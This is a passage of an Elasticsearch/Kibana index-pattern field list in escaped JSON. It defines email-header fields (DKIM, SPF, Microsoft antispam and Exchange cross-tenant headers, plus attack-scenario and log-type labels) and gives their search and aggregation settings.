ext\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"dkim-signature.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"dkim-signature\"}}},{\"name\":\"emailfolder\",\"type\":\"string\",\"esTypes\":[\"text\",\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"emailfolder.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"emailfolder\"}}},{\"name\":\"feedback-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"feedback-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"feedback-id\"}}},{\"name\":\"from\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"from.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"from\"}}},{\"name\":\"in-reply-to\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"in-reply-to.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"in-reply-to\"}}},{\"name\":\"infra.attack_scenario\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"infra.log_type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"infralogtype\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"infralogtype.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"infralogtype\"}}},{\"name\":\"message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"message-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"message-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"message-id\"}}},{\"name\":\"message.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"message\"}}},{\"name\":\"mime-version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"mime-version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"mime-version\"}}},{\"name\":\"received\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"received-spf\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"received-spf.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"received-spf\"}}},{\"name\":\"received.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"received\"}}},{\"name\":\"references\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"references.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"references\"}}},{\"name\":\"return-path\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"return-path.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"return-path\"}}},{\"name\":\"subject\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"subject.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"subject\"}}},{\"name\":\"thread-index\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"thread-index.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"thread-index\"}}},{\"name\":\"thread-topic\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"thread-topic.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"thread-topic\"}}},{\"name\":\"to\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"to.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"to\"}}},{\"name\":\"x-account-notification-type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-account-notification-type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-account-notification-type\"}}},{\"name\":\"x-eopattributedmessage\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-eopattributedmessage.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-eopattributedmessage\"}}},{\"name\":\"x-eoptenantattributedmessage\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-eoptenantattributedmessage.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-eoptenantattributedmessage\"}}},{\"name\":\"x-forefront-antispam-report-untrusted\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-forefront-antispam-report-untrusted.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-forefront-antispam-report-untrusted\"}}},{\"name\":\"x-gm-message-state\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-gm-message-state.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-gm-message-state\"}}},{\"name\":\"x-google-dkim-signature\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-google-dkim-signature.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-google-dkim-signature\"}}},{\"name\":\"x-google-smtp-source\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-google-smtp-source.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-google-smtp-source\"}}},{\"name\":\"x-incomingheadercount\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-incomingheadercount.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-incomingheadercount\"}}},{\"name\":\"x-incomingtopheadermarker\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-incomingtopheadermarker.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-incomingtopheadermarker\"}}},{\"name\":\"x-message-delivery\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-message-delivery.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-message-delivery\"}}},{\"name\":\"x-message-info\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-message-info.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-message-info\"}}},{\"name\":\"x-microsoft-antispam\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-mailbox-delivery\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-mailbox-delivery.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam-mailbox-delivery\"}}},{\"name\":\"x-microsoft-antispam-message-info\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-message-info-original\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-message-info-original.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam-message-info-original\"}}},{\"name\":\"x-microsoft-antispam-message-info.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam-message-info\"}}},{\"name\":\"x-microsoft-antispam-prvs\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-prvs.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam-prvs\"}}},{\"name\":\"x-microsoft-antispam-untrusted\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-untrusted.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam-untrusted\"}}},{\"name\":\"x-microsoft-antispam.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam\"}}},{\"name\":\"x-ms-exchange-antispam-messagedata\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-antispam-messagedata-original\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-antispam-messagedata-original.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-antispam-messagedata-original\"}}},{\"name\":\"x-ms-exchange-antispam-messagedata.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-antispam-messagedata\"}}},{\"name\":\"x-ms-exchange-authentication-results\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-authentication-results.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-authentication-results\"}}},{\"name\":\"x-ms-exchange-crosstenant-authas\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-authas.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-authas\"}}},{\"name\":\"x-ms-exchange-crosstenant-authsource\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-authsource.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-authsource\"}}},{\"name\":\"x-ms-exchange-crosstenant-fromentityheader\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-fromentityheader.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-fromentityheader\"}}},{\"name\":\"x-ms-exchange-crosstenant-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-id\"}}},{\"name\":\"x-ms-exchange-crosstenant-network-message-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-network-message-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-network-message-id\"}}},{\"name\":\"x-ms-exchange-crosstenant-originalarrivaltime\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-originalarrivaltime.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-originalarrivaltime\"}}},{\"name\":\"x-ms-exchange-crosstenant-originalattributedtenantconnectingip\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-originalattributedtenantconnectingip.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-originalattributedtenantconnectingip\"}}},{\"name\":\"x-ms-exchange-crosstenant-rms-persistedconsumerorg\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-rms-persistedconsumerorg.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-rms-persistedconsumerorg\"}}},{\"name\":\"x-ms-exchange-eopdirect\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-eopdirect.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-eopdirect\"}}},{\"name\":\"x-ms-exchange-minimumurldomainage\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-minimumurldomainage.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-minimumurldomainage\"}}},{\"name\":\"x-ms-exchange-organization-authas\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-authas.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-authas\"}}},{\"name\":\"x-ms-exchange-organization-authsource\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-authsource.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-authsource\"}}},{\"name\":\"x-ms-exchange-organization-expirationinterval\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-expirationinterval.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-expirationinterval\"}}},{\"name\":\"x-ms-exchange-organization-expirationintervalreason\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-expirationintervalreason.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-expirationintervalreason\"}}},{\"name\":\"x-ms-exchange-organization-expirationstarttime\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-expirationstarttime.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-expirationstarttime\"}}},{\"name\":\"x-ms-exchange-organization-expirationstarttimereason\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-expirationstarttimereason.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-expirationstarttimereason\"}}},{\"name\":\"x-ms-exchange-organization-messagedirectionality\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-messagedirectionality.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-messagedirectionality\"}}},{\"name\":\"x-ms-exchange-organization-network-message-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-network-message-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-network-message-id\"}}},{\"name\":\"x-ms-exchange-organization-pcl\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-pcl.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-pcl\"}}},{\"name\":\"x-ms-exchange-organization-recordreviewcfmtype\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-recordreviewcfmtype.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-recordreviewcfmtype\"}}},{\"name\":\"x-ms-exchange-organization-scl\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-organization-scl.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-organization-scl\"}}},{\"name\":\"x-ms-exchange-processed-by-bccfoldering\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-processed-by-bccfoldering.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-processed-by-bccfoldering\"}}},{\"name\":\"x-ms-exchange-senderadcheck\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-senderadcheck.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-senderadcheck\"}}},{\"name\":\"x-ms-exchange-transport-crosstenantheaderspromoted\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-transport-crosstenantheaderspromoted.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-transport-crosstenantheaderspromoted\"}}},{\"name\":\"x-ms-exchange-transport-crosstenantheadersstamped\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-transport-crosstenantheadersstamped.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-transport-crosstenantheadersstamped\"}}},{\"name\":\"x-ms-exchange-transport-crosstenantheadersstripped\",\"type\":\"string\",